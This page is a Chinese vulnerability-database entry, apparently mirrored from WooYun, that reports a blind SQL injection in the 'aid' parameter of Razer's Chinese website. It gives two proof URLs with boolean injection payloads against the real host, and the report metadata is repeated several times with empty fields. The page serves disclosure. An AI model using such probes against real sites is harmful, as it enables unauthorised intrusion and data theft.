雷蛇官方网站mysql注射漏洞

发表评论 (0) 查看评论

漏洞概要

缺陷编号： WooYun-2011-01402

漏洞标题：雷蛇官方网站mysql注射漏洞

漏洞作者：路人甲

提交时间： 2011-02-23

公开时间： 2011-02-23

漏洞类型： SQL注射漏洞

危害等级：中

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

漏洞详情

简要描述：

对sql查询过滤不严导致典型盲注,可获取数据库信息。

详细说明：

aid参数存在注入，没啥好解释的了。

漏洞证明：

http://cn.razerzone.com/about.php?aid=4%20aND%2011%3E10此页返回正常
http://cn.razerzone.com/about.php?aid=4%20aND%2011%3E12此页返回异常

← 遨游3 3.0.20.3000最近关闭页面存在跨站

iPhone MyDocs 2.7 Directory Traversal →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

雷蛇官方网站mysql注射漏洞

漏洞概要

缺陷编号： WooYun-2011-01402

漏洞标题：雷蛇官方网站mysql注射漏洞

相关厂商：雷蛇官网

漏洞作者：路人甲

提交时间： 2011-02-23

公开时间： 2011-02-23

漏洞类型： SQL注射漏洞

危害等级：中

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

漏洞详情

简要描述：

详细说明：

漏洞证明：

0 条评论。

发表评论

ZeroBox Vulnerability Database

坚持！我们将做的更好！

雷蛇官方网站mysql注射漏洞

漏洞概要

缺陷编号： WooYun-2011-01402

漏洞标题： 雷蛇官方网站mysql注射漏洞

相关厂商： 雷蛇官网

漏洞作者： 路人甲

提交时间： 2011-02-23

公开时间： 2011-02-23

漏洞类型： SQL注射漏洞

危害等级： 中

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

漏洞详情

简要描述：

详细说明：

漏洞证明：

0 条评论。

发表评论

漏洞标题：雷蛇官方网站mysql注射漏洞

相关厂商：雷蛇官网

漏洞作者：路人甲

危害等级：中

漏洞状态：未联系到厂商或者厂商积极忽略